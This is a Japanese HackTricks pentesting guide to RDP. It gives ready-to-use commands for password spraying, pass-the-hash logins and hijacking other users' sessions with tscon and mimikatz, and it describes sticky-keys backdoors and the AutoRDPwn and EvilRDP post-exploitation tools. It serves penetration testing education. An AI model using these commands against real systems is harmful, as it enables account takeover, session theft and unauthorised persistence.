hacktricks/network-services-pentesting/pentesting-rdp.md

3389 - RDPペネトレーションテスト

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法:

• HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください！
• 公式PEASS & HackTricksグッズを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
• 💬 Discordグループやテレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。

脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ。どこからでも完全なペネトレーションテストを実行できます。リコンからレポーティングまで、20以上のツールと機能があります。私たちはペネトレーションテスターを置き換えるものではありません - 私たちはカスタムツール、検出・エクスプロイトモジュールを開発して、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためのものです。

{% embed url="https://pentest-tools.com/" %}

基本情報

Remote Desktop Protocol (RDP) は、Microsoftによって開発された独自のプロトコルで、ユーザーがネットワーク接続を介して別のコンピュータにグラフィカルインターフェイスで接続することを可能にします。この目的のために、ユーザーはRDPクライアントソフトウェアを使用し、もう一方のコンピュータはRDPサーバーソフトウェアを実行する必要があります（こちらから）。

デフォルトポート: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

列挙

自動

{% code overflow="wrap" %}

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

{% endcode %}

利用可能な暗号化とDoS脆弱性をチェックし（サービスにDoSを引き起こさずに）、NTLM Windowsの情報（バージョン）を取得します。

ブルートフォース

注意：アカウントをロックする可能性があります

パスワードスプレー

注意：アカウントをロックする可能性があります

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

既知のクレデンシャル/ハッシュを使用して接続

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

既知のクレデンシャルをRDPサービスに対してチェックする

impacketのrdp_check.pyは、いくつかのクレデンシャルがRDPサービスに対して有効かどうかをチェックすることができます：

rdp_check <domain>/<name>:<password>@<IP>

攻撃

セッション盗み

SYSTEM権限を持っていれば、所有者のパスワードを知らなくても、任意のユーザーによって開かれたRDPセッションにアクセスできます。

開かれたセッションを取得:

query user

選択したセッションへのアクセス

tscon <ID> /dest:<SESSIONNAME>

選択したRDPセッション内に入ると、Windowsのツールと機能のみを使用してユーザーになりすますことができます。

重要：アクティブなRDPセッションにアクセスすると、それを使用していたユーザーはログオフされます。

プロセスをダンプしてパスワードを取得することもできますが、この方法ははるかに速く、ユーザーの仮想デスクトップと対話することができます（ディスクに保存されていないメモ帳のパスワード、他のマシンで開かれている他のRDPセッションなど...）

Mimikatz

これを行うためにもmimikatzを使用できます：

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

スティッキーキー & Utilman

この技術をスティッキーキーまたはutilmanと組み合わせることで、管理者のCMDにアクセスし、いつでも任意のRDPセッションを利用できます。

これらの技術でバックドアが設置されたRDPを検索するには、次のリンクを使用します: https://github.com/linuz/Sticky-Keys-Slayer

RDP プロセスインジェクション

異なるドメインの誰かが、またはより高い権限を持つユーザーがRDP経由でログインした場合、あなたが管理者であるPCにおいて、その人のRDPセッションプロセスにビーコンをインジェクトし、その人として行動することができます:

{% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} rdp-sessions-abuse.md {% endcontent-ref %}

ユーザーをRDPグループに追加

net localgroup "Remote Desktop Users" UserLoginName /add

自動ツール

• AutoRDPwn

AutoRDPwnはPowershellで作成されたポストエクスプロイトフレームワークで、主にMicrosoft Windowsコンピューターに対するShadow攻撃を自動化するために設計されています。この脆弱性（Microsoftによって機能としてリストされています）は、リモート攻撃者が被害者のデスクトップをその同意なしに閲覧し、さらに要求に応じてオペレーティングシステム自体のネイティブツールを使用して制御することを可能にします。

• EvilRDP
• コマンドラインから自動的にマウスとキーボードを制御
• コマンドラインから自動的にクリップボードを制御
• RDP経由でターゲットにネットワーク通信をチャネリングするクライアントからSOCKSプロキシを生成
• ファイルをアップロードせずにターゲット上で任意のSHELLおよびPowerShellコマンドを実行
• ターゲット上でファイル転送が無効になっている場合でも、ターゲットへのファイルのアップロードおよびダウンロード

HackTricks 自動コマンド

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>

**即時に利用可能な脆弱性評価 & ペネトレーションテストのセットアップ**。どこからでも完全なペネトレーションテストを実行できます。リコンからレポーティングまでの20以上のツール & 機能を備えています。私たちはペネトレーターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出 & エクスプロイトモジュールを開発しています。

{% embed url="https://pentest-tools.com/" %}

<details>

<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでAWSハッキングを学ぶ</strong></summary>

HackTricksをサポートする他の方法:

* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローしてください**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください**。

</details>